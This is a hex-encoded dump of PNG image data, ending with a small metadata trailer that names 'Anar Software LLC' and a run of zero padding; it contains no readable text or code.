b55f9a3469a2cc99335b2d0b0c0c54be7cf92ca607050569f8f0e116d38f
1f3faecd9b37a779ff591b71ad7cf9f2aa5dbb36270800041cc0933666cc
18952c59d2ecbf22458ae8a5975e52dbb66db560c102879efcb88bbd8ebf
bcbcbc74eedcb934777c3677ee5cbb374f4f52f5ead5ad56e93d71e2840e
1c3890aeedb970e142ab65a955f37d283e3ede66d3a1ca952beba5975e4a
d7677ff422df91cee390f10e1c38e0f48dd3430b162c301b59e3518f8f6e
604fd7ae5dad4e5fba7469ba3edbe34f67a5077dd838d331f093b67efd7a
d5a85143ad5bb7d6faf5ebdd165abff6da6b5ab76e9d4b02614fd4a95327
ab3503d27b8c6dddbad5ea8824efbfffbe4bd6dbcbcb4b376edcd0800103
d2f4fef9f3e7dbace1e8ccbe6edfbebdd58e64376dda64b376a62d75ebd6
b55b6e6da8e4366dda585d7e7af7dfeeddbbadd644ebd4a913270700041c
80274a4e4e567474b4366ddaa4be7dfbaa72e5ca6eadf69c1e53a64c4973
0073f0e0415dbc78d16ad9e3c30066b4eeddbb5b9dbe65cb1697dcfc5853
a54a1587c389efbefbce6653036ba3ed382a7bf6eca680e3c89123dabb77
2f5f480ff4cd37dfa47928d19b376fda0ce95e7cf14587e651b87061ab37
3cd1d1d1dabd7b77ba3edb891327ac3e198f8888b07a13e5a9525252b465
cb1675e8d041152a54d0c08103b575ebd674f793f3b8d0d0502d5dba5415
2a5478aa8ef1cc9933ab5dbb7656cb1c1999c79eb8b838ab7dd6d4ae5ddb
653585e6cc9993e65a84919191fafdf7dfad96d9ea28d85ae060eb863f2d
4d2c1f1ffef951f7efdfd7b973e7cca6f9fafada0c8c9c691a636b797ffc
f187c5f44a952a39550b0d0008388027e4efbfff569b366dd255a5d31d6e
ddbae57415f9c71d3a74c8e68df69352ac58319bcd45b66ddb96eef95fba
74c966f5f5d6ad5b3b348f989818cd9f3fdf6a59fdfaf5d3dc316dcb962d
4d4d20a8bde199ce9f3faf8d1b37bae57b676b0487c7b56ddbd66af3ade3
c78fa73adca323c1c0f5ebd72da6e7cc99d36a87bf4670f5ea55fde73fff
514444845e78e10575e9d2454b962cb1e86f24adfcfcfc3463c60c87f79f
11346ad4c8ea79e0d2a54bba75eb56bae76fada36b1f1f1fd5ab572fddf3
be7fffbecddfe7f47e4773e4c8e1d0fb1b376e6c339448cbef87bdd15b56
af5e6d11dcd5aa55cb6ab395b8b838970c7d6caba3f2060d1a70920040c0
0118c1bd7bf7f4d1471fe9e6cd9b1eb34edbb76f577c7c7cbae6616be407
472fe2dcc1dab0b88fdec0b982adf938d3be7ac68c19569f067b7b7b9b3a
b87386979797dab76f2fe9c193f8e5cb97f3c5f340dbb66d4b778860ebc6
3a2828c8a1f7db3a4e5d358ca9adda49e5ca9533fcfe8b8b8bd32fbffca2
5ebd7ae995575ed11b6fbca1debd7b6bd1a245164fc19d91376f5e4d9932
c5233aa77685b7df7efb891c632fbffc72bae77df8f0619ba35d65d4b9d1
5ac7acd28380282dc1dae8d1a3ad767e7afdfa75ab1dbedafa8db037da93
2bf6df2bafbcc249020001076014b76edd72baa777774a4f276f0fd90a6c
6cf5c89e11de7cf34dabd3636363ed76baea8c53a74e599d5eb468518787
2bbc7af5aacdb6cc2d5ab470baf3c12a55aa986a7e3ce9be5f609b2b863f
b6d549adb5f6f28fcb9a35abcda62cb69a9c39cbd6b1fb34debcfcf5d75f
5abc78b13ec4707d00002000494441543ef9e41355aa5449e5ca9553d7ae
5d3567ce1ca7038f77de79c7e6ef97d1d8aa45e7ee63cc1501873bcf8d0f
6bd8a5a662c58a56a7fff9e79f695a9ff3e7cfab6eddbadab2658beedebd
abdbb76f6bddba75aa59b3a6d5c0c4ddfbcfd679b25cb9724f4dc8078080
037826fcf4d34f2e6fc39d56c78e1d4bf73c6c0d87f724d9ba303c7bf6ac
cb9671e6cc199b65cef4e43f6dda34ab4ff3fdfdfdd5b97367a7d6e96127
8ef7efdfd77ffef31fbe6c1eca15219bad4e2f1d1926b642850a365f676b
540967942a55ca66d5faa7a106476aae5dbba6952b576ad0a041aa54a992
2a55aaa4091326385c23a0458b1686df0661616166a3393dcad6937b67e4
c891c3667f47850b1756ce9c390d7d6e2c5cb8b0cded97d680437a10ccb7
6edd5acf3fffbc4a962ca98e1d3b5a3d2e73e6cc69b5936e57fd4664ca94
c96667abd9b3675791224538510020e0008c222626265dfd4054ad5a559d
3b7756e7ce9dd35d4bc215cd653c25ac79c8cfcfcfe6932157b4fb7e743f
dae24c27777ffef9a7d6ae5d6bb5ac6ddbb60e3d9197a442850aa97af5ea
921eb4a77655df0070cf6fc09364af03e0f4debce4cf9f5f5f7df595cdf2
ecd9b32b53a64c1eb11fa64e9daae9d3a7ab5fbf7e6e5dceb973e7346edc
38bdf6da6b1a3e7c78aa37f8f5ead553d6ac590d7d8cbbf3180b0a0ad2d7
5f7f6df738b2d6778491ce8df63aab76450d8aa4a424bbcde48a172f6eb3
16457af75f962c593476ec58bb219411869406e0f97cd90440c63978f0a0
6ad4a891a6f7f6eedddbd4dbfebc79f3d2b51eaeb8e14f6f5f02ae66af7d
f39d3b775cb61c7b4fe79c7d7a3865ca14ab235a040505a95dbb769a3a75
6aaaf368d7ae9dbcbd1f64d5742eead96c0df1ea09df91a14387aa6fdfbe
699a6f6060a04337263972e4f0889a5f0d1a3490afafafeedebdabafbffe
daed616d6262a2befdf65bad59b346f3e6cd53b162c5acbeeee1d3edad5b
b71af618b7778cbdfffefb6ad2a449da2e567d7d55a85021d36f9dab7e83
dd1170a487bdce665d5183223dfbaf79f3e669be7ef1f1f151a1428552ad
69f6243b290740c001200d8e1e3d9ae6f73efffcf3921e0c459bde0e423d
adf685bb2fcc5c5135fa217b6189b317d7070e1cd08e1d3bac768edab973
67cd9c39d3ee4db1bfbfbf5ab56a25e941e778b686270452fb8ed8aa16ef
eae55fb972c563b647a64c99f4d24b2f69fffefd19b2bcf3e7cfab7efdfa
5ab16285cd9a0ef9f3e77f6a8fb1e0e060b78f1693de1be4277d6eb4770e
b97dfbf6135d7ece9c39d31d20b97bff018044c00164a8b4361f080d0d35
9df85d591be169626f14095bfd16a485bd79393a92c5a3a64c996235e0c8
93278f9a376f6e77c8c2468d1a2957ae5c92a8bd81f4ddbc242626babd56
96a3cdae32d26bafbd96610187f4a09952dbb66db569d32665c992c5a23c
bd4d2c9e347b01c7fdfbf7959c9cfccc1d63ce78f87b6e4d469cfbededbf
a4a424979e4bad317a132d009e818003c84069bd4079b4d32f57d6467856
b6ad2bdbfe67ce9cd966595af6cdb66ddb74e4c811aba35b74efde5d0b17
2eb47953f07068d8ebd7af33342c52656f8482eeddbb6bd5aa55cfdc3679
ebadb7347dfaf40c5de6850b17347dfa74f5e9d3c7a2cce80187bd262463
c78ed5942953f822da612df47ac8d15158dcf51b3163c60c7df9e597ec24
009e7f2e62130019e7c68d1b5ab76e9dd6ad5be7d4c81e952b5736fddb13
472ff1946d9b9650c259f6e6656f1decb175d11f1616a67af5ea592d2b53
a68c69e8cdf9f3e73ff1fe1de0f9ecf52f101010f04c6e9377de79e78984
0af3e7cfb75a63c6e8433c738ca54f6c6caccdb2b4d41074e5fe0b0c0c64
07013004020e20035dbf7e5d1d3b7654c78e1db572e54a87df57b3664dd3
bf69a2629dbd8e5333aa06477474749ae6b96ad52a9d3f7fde6a598f1e3d
ac4eefd8b1a3a4074d0be6ce9dcb018054d90be03c6584938ce6e3e3a388
88880c5f6e6464a44e9e3c69f51c6164f66e909fd563cc55db2f239a6f10
7000781a1070001e2e2c2cccac433a9aa85897909060f3e9579e3c795cb6
1c7b4f7baf5dbb96a679262525e9db6fbfb55a56a64c19bdfdf6db66d372
e4c8a1468d1a497a30346c6464240700d275f3626b88e56741444444aaa3
3bb8c3a54b972ca6193de0b017a23dcbc7982bbea31951d3c8defe73e579
1400dc898003f0708d1b3736fb9b1a1cb6edddbbd7eaf4b0b0b054871774
547878b8cdb2f48c62b278f1629b0149cf9e3dcdfe6ed9b2a5e969daac59
b3d8f170c8e1c3876d963932ccebd32a5fbe7c6adebc79862fd7da6ff95f
7ffdc531f60cbb78f1a2cdb2d2a54bbb7df9274e9cb039920cfb0f805110
70001e2c303050efbfff7eaa17c57860d7ae5d56a7fbfbfbbb6cf8455b01
c7e5cb976d36337144424282cdb0e2adb7de52993265243de804ae5dbb76
92a483070f6adfbe7dec783864fffefd367f3f1e0e43fdac1a346890dd11
24dce1f127e2f1f1f1dab3678fa1b7e3b56bd7ac36bde11873ccefbfffae
fbf7ef5b2d2b55aa94db97ffcf3fffe8c0810356cb8a162d9a211d9d0240
7a1170001e2c222242c1c1c1161720b06ee7ce9d36cb5c7571f8306878dc
f6eddbd33defefbfff5eb76fdfb65af6d1471f4992aa56adaab0b030490c
0d0be72426266af7eedd368f6b77f4919023470e356fdedce33b98cc952b
97060e1c98a1cb2c54a890d9df3b76ec307c27a3f67e0b73e5ca65d6dcd2
55fcfcfcd4ba75eb0ce9843323028683070f5a2d0b0d0d55f1e2c55db6ac
3265ca58fd5efef6db6f565f1f1010a0b265cbbafc337b7979292222c2ee
30d600e00c020ec04365cf9edda26982440d0e7b0e1d3aa4d3a74f5b2d7b
e79d77d23dff12254ad86c07ed8a615a636363f5fdf7df5b2d7bf7dd7715
1e1eae0e1d3a4892a2a2a2f4dffffe979d0ea7ac59b3c6e64d62952a555c
bebce1c387eb9b6fbed1be7dfb54a142058fde36ad5bb7b6e8efc65d4a96
2c6951ab6cddba754ff53126997798ed2a3d7bf6d4575f7da5fdfbf79bfa
2632b25f7ffdd56699ab3e5fd1a245b57af56a1d3b76cc5423d091fd57ab
562d977fde8e1d3b6adcb871dabf7fbfdab469c38f34807423e0003cd4d8
b163ad76ca46c0615b4a4a8aa64f9f6eb5ecd1a176d3aa6ad5aa56a71f3a
74485bb76e75c967983973a6d5215fbdbdbdf5e5975faa5ab56a92a479f3
e6d96c2b0dd8f2d34f3fd9ecebe5e1c83cae52a3460d3569d24492141717
67f3c9b4a7f0f2f2d2cc9933dd52cb20b51bd54b972e69f1e2c54fc531b6
73e74e9bcd1cdab56be7b2fe90a40741d1c71f7f2c494a4e4eb6d94cd148
ecfdb6bff7de7b2ed97ebd7bf796b7b7b73265caa43ffef8c3acecd8b163
36cf67ad5ab592bfbfbfcb3e6ba142854c35a7bcbdbd5d52133273e6ccf2
f2f2caf81baaff7f7b3e099932657a229f1920e000e0b056ad5aa9418306
56cb68a262dfd2a54baddec0152f5e5cafbcf24aba2e5e6c3d5d9a346992
cbd6ffdab56bfaf1c71fad9655ad5a55dedede4a4c4cd4bc79f3d8d970da
bd7bf7f4ef7fffdb6ad95b6fbde5b227ecd9b265d3d8b1634d7f0f1f3edc
6a70e769828282346fde3ce5ce9ddb6dcbc89b37af3a77ee6c366ddcb871
86d83e8e9a32658ad5e9850b17d6071f7ce09265f8f8f868c28409a67e21
264d9a94e691ac3cc9d5ab576d865d458b1655ab56add235fff0f070bdf7
de7b92a423478ee8d0a1430eefbfe0e06053a0e40ae3c78f370dbd3e73e6
cc34f763e5e5e5a56eddba69d7ae5d3a7dfab44e9c38a1d9b367bbf57bfc
50585898162e5ca893274feacf3fffd4ce9d3bd5ac5933b72fd7cbcb4b9d
3b77d6ce9d3bf5e79f7feae4c9939a33678e42424238d18180834d007896
0e1d3a98dd183ceeeeddbb6ca4546ee0468e1c69b5ac57af5e699e6f8306
0d54b468518be93b77eeb45ba5372dbefdf65b252727db2cffe5975f181a
d6934facde9e7d6afdfefbef6d8ed6306edc38e5ca952b5df3cf92258b66
cf9eadbc79f34a9256ae5ca955ab561966ff152e5c583ffef8a3451f19ae
ba29193972a4e9a64e7a30f2c892254b9eaaefc0dab56b6d76803c60c080
74d79279186e942b574e9274e0c001cd9831c325fbc79d37a48e9a3a75aa
cdc0ebb3cf3e4b7387b8bebebe1a3d7ab46958e471e3c6597dddce9d3b6d
d6e2e8d9b3a75e7ef9e5746f8b2fbffc526fbdf59624e9f4e9d31a3f7e7c
9ae7376dda347df1c5172a52a488bcbcbc942d5b36d5ad5b576bd7ae756b
e7c12fbdf492d6af5faf2a55aa284b962cf2f2f252585898264e9c68ea37
cb5d264d9aa47ffdeb5f0a0b0b93979797b266cdaadab56b6bfdfaf5167d
b701041c002429d50ecb5c7d13131010a021438668e4c891a68b0f6b1c6d
a262afb773578c676feb04ea0927d6c58b176bd9b26516d36bd6aca937de
78c3e9f965cd9a55fdfbf7b7987eedda3575ebd64d2929292e5dfff3e7cf
eb975f7eb1594ee7a28edf34f8fafa66e8fa64cf9edd66879aaeb8d0b6f5
fdca9e3dbbc3f3888b8b53d7ae5dad56830f0909d1c489134dc3103b2b47
8e1c5abc78b1e9c6e5c2850beadbb7afe18eab52a54a69cd9a357af3cd37
5d3adfc18307ab4e9d3aa6bfa3a2a2d4b1634725252539351f5b1d32bae2
78b71570d93b2f3d2e2525451f7ef8a16eddba65f55c376ddab4340769fe
fefe9a3973a6e929f9eddbb7d5bd7b77a79aecd9da4eee3c3766cb96cde1
e61de7cf9fd7a041836cce7fce9c39696a2af2d5575f99fa99d9b3678fd6
af5f6ff3b53d7bf6d4d5ab57ad6ebb2953a69802ccb4842c13274e54a74e
9d243d1841ecc30f3f4cf3c39b66cd9ad9ec9b247ffefc1a3264885b7e23
fcfcfc3479f26465cd9ad56a79dfbe7dad3e147185c68d1b9b9aff3d2e34
345443870ee5e200041c002ca5d6d99cab86bcf3f6f656b366cdb47dfb76
75edda35d5d73bda44e5e1932d6bd2fbf4c5dbdb5bd5ab57b75a161212e2
b22159d3a37ffffe16d55dbdbcbc346dda34a7abad8e1a35ca3472c94349
4949ead6ad9ba2a2a2dcb2feb6aa081f387040fbf7efe70bfaff7bedb5d7
ec9667447f0a8faa5dbbb6cdb292254ba63bccb1f5bd2b5cb8b0d53e7b6c
3970e080860d1b66b5ac7af5ea5ab66c9953f37bf89bb86cd932d3efcbcd
9b37d5b16347c5c6c61ae2583a77ee9cd9f73957ae5c5ab468913efef8e3
748f02e3e7e7a711234698fdc6dfbb774f9d3a75d2e5cb979d9e5fc58a15
6dee8382050ba6793db365cba6175f7cd16a59ddba759d0af62f5dbaa45e
bd7a590d805f78e105ad5ebddae9ef44be7cf9347ffe7c534874efde3d75
e9d2457ffdf597c3f32851a284cdbe12d27b6e946c77a4eae5e5a5975e7a
c9e1f92c58b0408b162db2b9ff67ce9ce9f0c8313e3e3e1a3060805ab468
21e9c183923e7dfad87d4f7474b43efcf043abc3d68687876bcd9a354e6f
af909010cd9e3d5b4d9b36359d473ffae8231d3f7e3ccddbfb61731b5b6c
fd66a6d70b2fbc60f73ad0cfcfcf259d9ba7e533d7a851838b0310700030
3f010f1932c4ec299b354d9a3451cb962d9d1e17decbcb4b3973e654ad5a
b5347af468edd9b34713274e548102051c7a7f6a3538bcbcbcf4d65b6f69
f4e8d1365ff3c9279fa4f9c45bb264494d9d3a55952a55b2b9fcb163c73a
fc79dc252e2e4ecd9b37d7993367cca6878686eaa79f7e72e8c98abfbfbf
c68e1d6bf1a4e4eeddbbfae0830fdcdaa1dd912347b46ddb368be9d4de78
c0d7d757952b57d6bbefbe6bf7758d1b37569b366d9cfe9e3acbc7c7472d
5ab4d0f0e1c36dbea677efde2a5fbe7c9ae69f3f7f7e4d9830c15433c2da
f2bffdf65ba79a55cc9e3ddb66b5f0b265cb6addba75eadebd7baa354f8a
172fae69d3a669f3e6cd2a51a284a4072302b56cd9325d372e1929262646
ad5bb756f5ead5b565cb16b3e3ac7ffffedab973a79a376f9ea69a7b65cb
96d58a152bcc3a718d898951bb76ed6c36e3b077dc77ecd8d1661f4d5e5e
5eeadfbf7f9a9e1c172a544853a74eb5b9bfc3c3c33570e040a702ec8d1b
37ea934f3eb15abba270e1c25ab972a5faf7ef6f7374aa87f2e6cdab1123
4668d7ae5da6ef406262a23a77ee6cf577d296575e794553a74eb559fefe
fbefab41830669dacf458a14d18811236c3e5997a461c3863915ba0e1830
401b366cb019a46cdcb851d5ab57b7bbbe6fbdf596d6af5f6f362adb679f
7da6b367cfa6bafcbd7bf7eac30f3f547c7cbc45596868a87efef9670d1e
3c58458a14b13b9fe0e0607df1c517dabd7bb729004a4e4ed6c71f7f9cee
e66b8f3f7c785ceedcb9cd9a84b94a6acb7d784cb8437878b8ddf2ecd9b3
3f15c3260369e5252985cd806735c8f8e1871fcc2e0c73e7ceaddcb9733b
d556f6eeddbb8a8c8c742878c8952b97828383d3558db875ebd66617e045
8b1635751a181010a0fcf9f33bdc93f79d3b7714191969aa1adaa74f1f8b
910e5ab468a1ce9d3b2b202040f9f2e573f84221252545d1d1d18a8a8a52
4a4a8aeeddbb97eacde8a301cca79f7e6a317dfdfaf5a661521d952b572e
cd9f3fdfa2464b5c5c9ca64d9ba6458b165954c3f5f7f757fdfaf5d5a347
0f952a55caac2c2a2a4aeddbb7b7e879de1d2a55aaa49f7efac9f4f7b56b
d754a142856766f494575f7dd5665057a04001a79a65242424e8e2c58b4a
4848b0281b3c78b076eedce9f4fa2d5ab4c874f15ca040018743949b376f
eaead5aba627db5f7df595c510a123468c50c58a15e5ededad3c79f22867
ce9c0efd2ea5a4a428323252376edc30fb0e474747db7c4fd3a64d357efc
789beb1f1f1faf8d1b37eafcf9f3ba74e99262626254a85021152d5a5445
8b1655f9f2e5cd6eb0ce9c39a38e1d3beacf3ffff4c8e3eac2850b66bfc1
4949496ad3a68de946d9cbcb4b5dba74d1c081032db6c9c58b17b561c306
ad5fbf5e3b77eeb4f95dcc9d3bb7de7cf34d454444588ce074fcf87175ea
d429d55a07152a54d0a851a3cc7e970a172eec54338747cf4b73e7ce3575
4efcf9e79f9b0d0b1c1212e270e784292929faf3cf3fcd3e7bc3860ded9e
03df7aeb2dcd9a35cbe64d57525292b66cd9a2d3a74febf2e5cbba7efdba
f2e7cfaff0f070858787ebd5575f35ab45131515a5ce9d3b6befdebd3697
99356b56d3f0dd7e7e7eca972f9fcde604d67e2fae5ebd6aaa313966cc18
8ba0a16ad5aa1a3468907c7d7d952f5f3e65cb96cde163f0d6ad5b8a8c8c
34354d6adab4a9d5e63cd2831a9383070f56972e5d6cceefca952b5abb76
adfefaeb2f4546462a6fdebc7afef9e755ba7469952d5bd62264b135da98
bd60e83ffff98fcdda8fc9c9c9dabe7dbb8e1f3faecb972febdab56b0a0d
0d557878b8e937e2d16b8798981875efdeddec5a26ad162d5a647794b42b
57aea43958b6a77cf9f25ab972a5ddd7f4ebd74ff3e7cf77f9b2e7cd9b67
b7664a545494c57e079e25be6c023cb307bfafaf4a972e9deef964ca94c9
a124df551e6fa212101090e6cf91397366b32701d62efe828383d334ff47
0323492eb9294fcb10b9376edc50d3a64dd5bb776f75e9d2c5747390356b
56f5ebd74f7dfaf4d1d9b367f5f7df7febce9d3b2a58b0a08a152b66f562
75f9f2e51a366c98d576c9eeb063c70e1d3870c0540df8591b1a365bb66c
2ef98e3efc9e142b56cce672d2a24489124e37e3901ef49ff0681f0ad6fa
53285cb8709abf7779f3e6356b1f9f5aa0ba64c9129d3d7b56fffad7bfac
de08040606aa7efdfaa92e3b3939598b172fd690214374fbf66dc31c6723
478e34ab05909292a219336668e5ca95ead1a3872222224c37d7050b1654
c78e1dd5b16347ddbb774f57af5ed5b56bd74cbf09b973e756debc79ad9e
13e2e2e23467ce1c4d9c38d1a1dfb2f41eff8fafc3a3fd4b142c5830cdf3
f6f2f2b2a885905aff1cdbb76f57ddba753574e850ab4d387c7c7c54a346
0d87aad66fd8b041fdfbf74ff577d8c7c727cd9f312020c0ece9bbb55a2d
d9b3674ff3fc73e4c861364f7bdfd1e4e4640d1d3a54870e1dd2a04183ac
d676c9972f5faac33cc7c7c7eb8b2fbed082050b9c5edffdfbf7ab6eddba
1a3c78b0d5da43dededeaa5cb9b243c3b16fdfbe5dfdfaf54bf388298fdb
b46993dde5daebcf2a3d8e1e3daaab57afdaec8be4ce9d3bdabc79b35b96
bd79f366bb0187bb3e3360143451010c262d37f94f8b9b376fa6799b8d1c
3952952b57d68a152bcc7aa7f7f1f1d173cf3da76ad5aaa97efdfa2a57ae
9cd90d6f4a4a8a76eddaa5060d1aa87bf7ee19166e3c74e4c8115340f4fd
f7dff305805becdfbf5f0d1a3450e7ce9d9d6e56929898a8b56bd7aa4e9d
3afae4934f0c156efcfcf3cffaf6db6fad965dbe7c5983060d52c58a1535
75ea548b1bb287352a5e7df555d5af5f5ff5ebd7d7ebafbf6e112c444747
6bf2e4c9aa58b1a2468d1af5ccfe869f3b774eeddbb75793264db467cf1e
a73a674e4949d1f6eddbd5a2450bb56fdf3ec37f873de5587df3cd37356c
d830a786c34d4949d1a64d9b54ab56ad34851b0f5dba74495dbb7655bd7a
f5f4ebafbfda1de9cb9adf7fff5d1d3a7450f3e6cd5d166e48d29c39736c
d6a83c73e68cdd51e9d2233e3e5e03060cb0da41704a4a8a860f1f9ea6fe
751cf1fdf7dfdb6cde76fefc79bb4d948167014d5400781c5b4d54c68f1f
9faea1e41eca9a35abaa55aba6dab56bab68d1a2ca93278fa969527474b4
ae5dbba60b172e68f3e6cddab871a3db3a124d4dbe7cf9b46bd72ef9fbfb
6be9d2a5666da801772a52a4886ad6aca9ca952bab4081020a090951ae5c
b9949292a2d8d858454646eae0c183fadffffea7356bd6983589f17453a7
4e958f8f8f6edfbeadcf3fffdc6ab3255b0a172eacb7df7e5b952a5552fe
fcf94db5d4828282141f1fafe8e868454747ebead5abdabd7bb77efbed37
1d3b76cce5232d3d0df2e4c9a31a356aa85ab56a2a54a890f2e4c9a3e0e0
60797b7b2b2e2e4ed7af5fd7a14387b47fff7ead59b346972e5d62a33dbc
78f7f252d9b26555bd7a75bdf1c61ba66d9723470eddbf7f5f3131313a7d
fab476ecd8a1952b57eaf4e9d32e5f875cb97299f65f585898691d7c7d7d
75fbf66dddb87143870f1fd6810307b476ed5a97861a8ff3f7f757cf9e3d
d5a041038587872b3232529b376fd6975f7ea9b8b838b7ee8b975e7a499f
7df699ca962dab4c9932e9f8f1e31a3f7ebc4b9adfd8e3e7e7a71e3d7aa8
51a3462a5ab4a8222323b575eb560d1f3edc50213340c001e099d0af5f3f
f5eedddb627a9f3e7dccfa4d71f505a3248fba11193d7ab4dab56b2749aa
53a78e0e1d3ac4c18127c6dbdbdbe9a7b6cf0a1f1f1fa7877a85317e87f9
8e3ab7ffbcbcbc9ef83a3ca9e3e7492dfb497e66c013d10707008f63ab23
badf7fffdd6dcbf4b48b8342850aa955ab56921eb45926dcc09346b8611b
e1c6d3f93bcc77d4f9fdf7a4f7e1935cfe935a36df1bc01c7d7000f038d6
028ee8e8688f1d95c11d3ef9e413d3080e93264de2a0000000005241c001
c0e3580b387efbedb767e6f3878787ab69d3a692a403070e68fbf6ed1c14
000000402a68a202c0e3581b7ad3a82388f8f9f9a944891292a453a74e99
8de062cba041834cc32e8e183182030200000070000107800c933f7f7eb5
6ad54a050b16d4eeddbbb56edd3addba75cbec350101012a5dbab4d9b4e3
c78f6bf7eedd86fbbcb56ad5d2f8f1e3151c1c2ce9ff0db3b77fff7e9bef
a95ab5aade7df75d49d2860d1bb473e74e0e1c000000c0018ca2022043bc
f2ca2b5ab06081b267cf6e9a76e4c811d5ad5bd7ac83be575f7d552b56ac
307b6fd7ae5db572e54a437dded0d050edd8b143993367369b7ef9f265bd
f1c61b4a4c4cb4788fbfbfbfb66eddaab0b030252424a8468d1a3a73e60c
070f000000e000fae000e0763e3e3efafaebafcdc20d497af1c517d5a143
07b3696fbef9a6d9df2b56ac305cb82149efbefbae45b8213da8c552bc78
71abefe9d7af9fc2c2c2243d1822967003000000701c010700b70b0b0bd3
73cf3d67b5ac71e3c6a67f67ce9c59efbfffbee9ef6bd7ae69c0800186fc
cc850a1572eaf5cd9b3757f7eedd25493b76ecd0cc993339700000000027
10700070bb7cf9f2d92c2b57ae9c4a972e2d6f6f6ff5e9d34721212192a4
7ffef947eddbb7d7cd9b370df999fffaeb2f9b6557af5efd7f3fc2dedeea
ddbbb7264c982049ba70e182ba76edaae4e4640e1c000000c00974320ac0
edec35b5f0f1f1d17ffffb5f5dba7449cf3fffbc24293131511d3b76d4c1
83070dfb99f7eeddab9494147979795994f5e8d1437bf6ec518912251411
11616a9672fdfa75b56fdf5e376edce0a0010000009c4427a30032c4a64d
9b54aa54a9545f77e9d225f5e8d1437bf7ee35fc671e3a74a8ba74e9e2d0
6bcf9c39a3366ddad8adf901000000c0361f4943d90c00dc6defdebd6adc
b8b1020303ad962726266ac99225ead4a993ce9e3dfb547ce61d3b762867
ce9c7ae9a597e4ed6dbd45e0bd7bf7346dda34f5ecd9535151511c280000
00401a5183034086090a0a52e7ce9d55b66c59152a544877eedcd1df7fff
ad43870e69f1e2c5ba7efdfa53f9b94b952aa5a64d9baa78f1e20a0b0b53
6c6cac2e5dbaa46ddbb669fdfaf58a8e8ee6e000000000d2898003000000
0000181ea3a8000000000000c323e00000000000008647c0010000000000
0c8f80030000000000181e01070000000000303c020e0000000000607804
1c0000000000c0f00838000000000080e11170000000000000c323e00000
000000008647c00100000000000c8f80030000000000181e010700000000
00303c020e00000000006078041c0000000000c0f00838000000000080e1
1170000000000000c323e00000000000008647c00100000000000c8f8003
0000000000181e01070000000000303c020e00000000006078041c000000
0000c0f00838000000000080e11170000000000000c323e0000000000000
8647c00100000000000c8f80030000000000181e01070000000000303c02
0e00000000006078041c0000000000c0f00838000000000080e111700000
00000000c323e00000000000008647c00100000000000c8f800300000000
00181e01070000000000303c020e00000000006078041c0000000000c0f0
0838000000000080e11170000000000000c323e00000000000008647c001
00000000000c8f80030000000000181e01070000000000303c020e000000
00006078041c0000000000c0f00838000000000080e11170000000000000
c323e00000000000008647c00100000000000c8f80030000000000181e01
070000000000303c020e00000000006078041c0000000000c0f008380000
00000080e11170000000000000c323e00000000000008647c00100000000
000c8f8003c0ffd78e1d900000000008faffba1d81ce100000604f700000
00007b8203000000d8131c000000c09ee000000000f60407000000b02738
000000803dc101000000ec090e000000604f1d1f119a000006d149444154
70000000007b8203000000d8131c000000c09ee000000000f60407000000
b02738000000803dc101000000ec090e000000604f70000000007b820300
0000d8131c000000c09ee000000000f60407000000b02738000000803dc1
01000000ec090e000000604f70000000007b8203000000d8131c000000c0
9ee000000000f60407000000b02738000000803dc101000000ec090e0000
00604f70000000007b8203000000d8131c000000c09ee000000000f60407
000000b02738000000803dc101000000ec090e000000604f70000000007b
8203000000d8131c000000c09ee000000000f60407000000b02738000000
803dc101000000ec090e000000604f70000000007b8203000000d8131c00
0000c09ee000000000f60407000000b02738000000803dc101000000ec09
0e000000604f70000000007b8203000000d8131c000000c09ee000000000
f60407000000b02738000000803dc101000000ec090e000000604f700000
00007b8203000000d8131c000000c09ee000000000f60407000000b02738
000000803dc101000000ec090e000000604f70000000007b8203000000d8
131c000000c09ee000000000f60407000000b02738000000803dc1010000
00ec090e000000604f70000000007b8203000000d8131c000000c09ee000
000000f60407000000b02738000000803dc101000000ec090e000000604f
70000000007b8203000000d8131c000000c09ee000000000f60407000000
b02738000000803dc101000000ec090e000000604f70000000007b820300
0000d8131c000000c09ee000000000f60407000000b02738000000803dc1
01000000ec090e000000604f70000000007b8203000000d8131c000000c0
9ee000000000f60407000000b02738000000803dc101000000ec090e0000
00604f70000000007b8203000000d8131c000000c09ee000000000f60407
000000b02738000000803dc101000000ec090e000000604f70000000007b
8203000000d8131c000000c09ee000000000f60407000000b02738000000
803dc101000000ec090e000000604f70000000007b8203000000d8131c00
0000c09ee000000000f60407000000b02738000000803dc101000000ec09
0e000000604f70000000007b8203000000d8131c000000c09ee000000000
f60407000000b02738000000803dc101000000ec090e000000604f700000
00007b8203000000d8131c000000c09ee000000000f60407000000b02738
000000803dc101000000ec090e000000604f70000000007b8203000000d8
131c000000c09ee000000000f60407000000b02738000000803dc1010000
00ec090e000000604f70000000007b8203000000d8131c000000c09ee000
000000f60407000000b02738000000803dc101000000ec090e000000604f
70000000007b8203000000d8131c000000c09ee000000000f60407000000
b02738000000803dc101000000ec090e000000604f70000000007b820300
0000d8131c000000c09ee000000000f60407000000b02738000000803dc1
01000000ec090e000000604f70000000007b8203000000d8131c000000c0
9ee000000000f60407000000b02738000000803dc101000000ec090e0000
00604f70000000007b8203000000d8131c000000c09ee000000000f60407
000000b02738000000803dc101000000ec090e000000604f70000000007b
8203000000d8131c000000c09ee000000000f60407000000b02738000000
803dc101000000ec090e000000604f70000000007b8203000000d8131c00
0000c09ee000000000f60407000000b02738000000803dc101000000ec09
0e000000604f70000000007b8203000000d8131c000000c09ee000000000
f60407000000b02738000000803dc101000000ec090e000000604f700000
00007b8203000000d8131c000000c09ee000000000f60407000000b02738
000000803dc101000000ec090e000000604f70000000007b8203000000d8
131c000000c09ee000000000f60407000000b02738000000803dc1010000
00ec090e000000604f70000000007b8203000000d8131c000000c09ee000
000000f60407000000b02738000000803dc101000000ec090e000000604f
70000000007b8203000000d8131c000000c09ee000000000f60407000000
b02738000000803dc101000000ec090e000000604f70000000007b820300
0000d8131c000000c09ee000000000f60407000000b02738000000803dc1
01000000ec090e000000604f70000000007b8203000000d8131c000000c0
9ee000000000f60407000000b02738000000803dc101000000ec090e0000
00604f70000000007b8203000000d8131c000000c09ee000000000f60407
000000b02738000000803dc101000000ec090e000000604f70000000007b
01d8970ed570eeaed50000000049454e44ae42608254434d500000000200
0003305450453200000012000003416e617220536f667477617265204c4c
430000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
